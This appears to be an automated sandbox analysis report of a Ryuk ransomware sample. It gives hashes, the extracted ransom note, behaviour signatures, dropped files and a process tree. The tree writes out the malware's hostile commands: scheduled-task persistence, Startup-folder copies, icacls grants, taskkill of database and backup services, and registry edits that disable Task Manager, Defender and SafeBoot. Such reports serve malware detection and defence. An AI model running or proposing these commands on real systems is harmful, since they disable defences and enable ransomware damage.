Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    19-07-2023 14:04

General

  • Target

    ecd9d8ef99eb98exe_JC.exe

  • Size

    889KB

  • MD5

    ecd9d8ef99eb9813fa4eced549ea4d88

  • SHA1

    7db7bff4ca9e94bbfe026c2282f3ce36e423f183

  • SHA256

    fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

  • SHA512

    2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

  • SSDEEP

    12288:GFGYwyCMcRzRjWYgeWYg955/155/KQurE+HG8dSyjCtRronBeSrBa:GFGYtSNBQKEmG8HjCXrUVa

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Renames multiple (5399) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:2136
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1656
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:1876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:2576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:1672
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2528
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:2516
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:2012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\system32\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Windows\system32\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\system32\icacls.exe
            icacls * /grant Everyone:(OI)(CI)F /T /C /Q
            4⤵
            • Modifies file permissions
            PID:2828
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\system32\cmd.exe
          cmd.exe /c taskkill /t /f /im sql*
          3⤵
            PID:2508
            • C:\Windows\system32\taskkill.exe
              taskkill /t /f /im sql*
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2908
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2900
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
          2⤵
            PID:2844
            • C:\Windows\system32\reg.exe
              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
              3⤵
                PID:844
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
              2⤵
                PID:3052
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                2⤵
                  PID:2156
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                  2⤵
                    PID:2856
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                    2⤵
                      PID:2712
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                      2⤵
                        PID:2772
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        2⤵
                          PID:2480
                          • C:\Windows\system32\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            3⤵
                              PID:372
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1924
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1608
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                2⤵
                                  PID:2808
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    3⤵
                                      PID:3008
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:584
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:2944

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

                                      Filesize

                                      144B

                                      MD5

                                      2d581d7f41be876ce36523d0a7f2a64a

                                      SHA1

                                      279f1b7f8936ab44e75bec3695d68569d8bbca9e

                                      SHA256

                                      53c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd

                                      SHA512

                                      4caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53

                                    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

                                      Filesize

                                      1KB

                                      MD5

                                      82ea3d2f6fc005352ce69909570def3d

                                      SHA1

                                      a43c1be5adc6a957d8a4ed727c3d1d5c648b6397

                                      SHA256

                                      56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc

                                      SHA512

                                      197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

                                    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

                                      Filesize

                                      889KB

                                      MD5

                                      ecd9d8ef99eb9813fa4eced549ea4d88

                                      SHA1

                                      7db7bff4ca9e94bbfe026c2282f3ce36e423f183

                                      SHA256

                                      fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

                                      SHA512

                                      2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

                                    • C:\ProgramData\RYUKID

                                      Filesize

                                      8B

                                      MD5

                                      609261b3d4e430ff93b8c8cdca7be429

                                      SHA1

                                      cd2be2be6cab95914147dd192c288b5e43f95d2b

                                      SHA256

                                      b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3

                                      SHA512

                                      4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

                                    • C:\ProgramData\RyukReadMe.txt

                                      Filesize

                                      1KB

                                      MD5

                                      82ea3d2f6fc005352ce69909570def3d

                                      SHA1

                                      a43c1be5adc6a957d8a4ed727c3d1d5c648b6397

                                      SHA256

                                      56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc

                                      SHA512

                                      197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

                                    • C:\ProgramData\hrmlog1

                                      Filesize

                                      8KB

                                      MD5

                                      87266b0a2f17c202002a02cdf7a14feb

                                      SHA1

                                      c26e1d9d95c6c77383925af484e5fa1bff6b42bb

                                      SHA256

                                      a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

                                      SHA512

                                      651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

                                    • C:\ProgramData\hrmlog1

                                      Filesize

                                      8KB

                                      MD5

                                      87266b0a2f17c202002a02cdf7a14feb

                                      SHA1

                                      c26e1d9d95c6c77383925af484e5fa1bff6b42bb

                                      SHA256

                                      a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

                                      SHA512

                                      651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

                                    • C:\ProgramData\hrmlog1

                                      Filesize

                                      8KB

                                      MD5

                                      87266b0a2f17c202002a02cdf7a14feb

                                      SHA1

                                      c26e1d9d95c6c77383925af484e5fa1bff6b42bb

                                      SHA256

                                      a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

                                      SHA512

                                      651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

                                    • C:\ProgramData\hrmlog2

                                      Filesize

                                      292B

                                      MD5

                                      4fd17a6fe54d7ef1d007d3bab3ff5fce

                                      SHA1

                                      4b76934d7e6214db44d83777899bd69db3294435

                                      SHA256

                                      402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b

                                      SHA512

                                      bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

                                    • C:\ProgramData\hrmlog2

                                      Filesize

                                      292B

                                      MD5

                                      4fd17a6fe54d7ef1d007d3bab3ff5fce

                                      SHA1

                                      4b76934d7e6214db44d83777899bd69db3294435

                                      SHA256

                                      402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b

                                      SHA512

                                      bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

                                    • C:\ProgramData\ryuk.exe

                                      Filesize

                                      889KB

                                      MD5

                                      ecd9d8ef99eb9813fa4eced549ea4d88

                                      SHA1

                                      7db7bff4ca9e94bbfe026c2282f3ce36e423f183

                                      SHA256

                                      fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

                                      SHA512

                                      2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

                                    • C:\Users\Admin\AppData\Local\Temp\RYUKID

                                      Filesize

                                      8B

                                      MD5

                                      609261b3d4e430ff93b8c8cdca7be429

                                      SHA1

                                      cd2be2be6cab95914147dd192c288b5e43f95d2b

                                      SHA256

                                      b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3

                                      SHA512

                                      4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

                                    • C:\Users\Admin\AppData\Local\Temp\hrmlog1

                                      Filesize

                                      8KB

                                      MD5

                                      87266b0a2f17c202002a02cdf7a14feb

                                      SHA1

                                      c26e1d9d95c6c77383925af484e5fa1bff6b42bb

                                      SHA256

                                      a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c

                                      SHA512

                                      651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

                                    • C:\Users\Admin\AppData\Local\Temp\hrmlog2

                                      Filesize

                                      292B

                                      MD5

                                      4fd17a6fe54d7ef1d007d3bab3ff5fce

                                      SHA1

                                      4b76934d7e6214db44d83777899bd69db3294435

                                      SHA256

                                      402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b

                                      SHA512

                                      bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

                                      Filesize

                                      889KB

                                      MD5

                                      ecd9d8ef99eb9813fa4eced549ea4d88

                                      SHA1

                                      7db7bff4ca9e94bbfe026c2282f3ce36e423f183

                                      SHA256

                                      fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6

                                      SHA512

                                      2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b